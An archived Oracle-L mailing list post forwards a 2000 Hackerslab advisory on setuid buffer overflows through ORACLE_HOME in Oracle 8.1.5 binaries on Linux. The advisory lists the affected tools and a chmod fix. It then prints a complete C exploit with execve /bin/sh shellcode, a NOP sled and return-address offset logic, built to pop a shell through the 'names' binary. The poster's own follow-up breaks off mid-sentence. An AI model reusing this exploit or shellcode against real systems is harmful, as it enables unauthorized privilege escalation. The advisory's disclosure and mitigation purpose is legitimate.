Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Mailing Lists -> Oracle-L -> securityfocus. Hackerslab Advisory. 8.1.5 Linux Platform

securityfocus. Hackerslab Advisory. 8.1.5 Linux Platform

From: Juan Manuel Pascual Escriba <pask_at_plazasite.com>
Date: Mon, 30 Oct 2000 12:22:40 +0100
Message-Id: <10665.120557@fatcity.com> 





Last 21 of October hackerslab guys published the next advisory with
Oracle 8.1.5 security related themes.







             [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability









File   :   Oracle 8.1.5




SYSTEM :   LINUX


           Tested by  RedHat Linux 6.2




INFO :


There are two security vulnerability in Oracle.




    
  
  1.   buffer overflow
It is possible to create a buffer overflow vulnerability using
"ORACLE_HOME",

one of the environmental value of Oracle.
Oracle applications that are vulnerable to buffer overflow are as follow
:

    
- names
    

  
      
    
    •   namesctl
    
    •   onrsd
    
    •   osslogin
    
    •   tnslsnr
    
    •   tnsping
    
    •   trcasst
    
    •   trcroute
Thease applications allow an attacker to excute a buffer overflow
exploit.



  
    
  
  2.   Log-files created
When a user excutes one of Oracle applications such as names, oracle or
tnslsnr,
following log files are created.






names




-rw-rw-r--   1 oracle   dba             0 Oct 20 01:45 ckpcch.ora

-rw-rw-r--   1 oracle   dba           428 Oct 20 01:45 ckpreg.ora

-rw-rw-r--   1 oracle   dba           950 Oct 20 01:45 names.log




oracle




-rw-rw----   1 oracle   dba           616 Oct 20 05:14 ora_[running

pid].trc



tnslsnr




-rw-rw-r--   1 oracle   dba       2182176 Oct 20  2000 listener.log






SOLUTION


Contact your vendor for a patch or close setuid permission.



# su - oracle


$ cd /oracle_8.1.5_install_directory/bin
$ chmod a-s names  namesctl  onrsd  osslogin  tnslsnr  tnsping  trcasst
trcroute





==-------------------------------------------------------------------------------==

       ********
   *    **   **    *
 *      **   **      *
*       ******       *
 *      **   **      *
loveyou_at_hackerslab.org     [yong-jun, kim]
   *    **   **    *                                    [
http://www.hackerslab.org ]
       ********            HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------------==








/*


        Oracle 8.1.5 exploit
                                -by loveyou

        offset value : -500 ~ +500





*/


#include <stdio.h>


#include <stdlib.h>


#define BUFFER                  800
#define NOP                     0x90
#define PATH               "/hackerslab/loveyou/oracle/8.1.5/bin/names"





char shellcode[] =


/* - K2 - */


/* main: */

"\xeb\x1d"                                        /* jmp
callz                          */
/* start: */
"\x5e"                                                 /* popl
%esi                             */
"\x29\xc0"                                         /* subl %eax,
%eax           */
"\x88\x46\x07"                              /* movb %al, 0x07(%esi)
*/
"\x89\x46\x0c"                                /* movl %eax,
0x0c(%esi)          */
"\x89\x76\x08"                                /* movl %esi,
0x08(%esi)          */
"\xb0\x0b"                                        /* movb $0x0b,
%al            */
"\x87\xf3"                                          /* xchgl %esi,
%ebx         */
"\x8d\x4b\x08"                                /* leal 0x08(%ebx),
%ecx          */
"\x8d\x53\x0c"                                /* leal 0x0c(%ebx),
%edx          */
"\xcd\x80"                                        /* int
$0x80                          */
"\x29\xc0"                                        /* subl %eax,
%eax            */
"\x40"                                                 /* incl
%eax                             */
"\xcd\x80"                                        /* int
$0x80                          */
/* callz: */
"\xe8\xde\xff\xff\xff"                    /* call
start                         */




"/bin/sh";




unsigned long getesp(void)


{


        __asm__("movl %esp,%eax");


}



int main(int argc, char *argv[])


{

        char *buff, *ptr,binary[120];
        long *addr_ptr, addr;
        int bsize=BUFFER;
        int i,offset;

        offset = 0 ;

        if ( argc > 1 ) offset = atoi(argv[1]);

        buff = malloc(bsize);
        addr = getesp() - 5933 - offset;
        ptr = buff;
        addr_ptr = (long *) ptr;

        for (i = 0; i < bsize; i+=4)
                *(addr_ptr++) = addr;

        memset(buff,bsize/2,NOP);

        ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
        for (i = 0; i < strlen(shellcode); i++)
                *(ptr++) = shellcode[i];

        buff[bsize - 1] = '\0';

        setenv("ORACLE_HOME",buff,1);

        printf("[ offset:%d buffer=%d ret:0x%x ]\n",
                offset,strlen(buff),addr);
        system(PATH);





}





I try to test this overflows with my 8.1.5 binaries. The buffer overflow
Received on Mon Oct 30 2000 - 05:22:40 CST












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US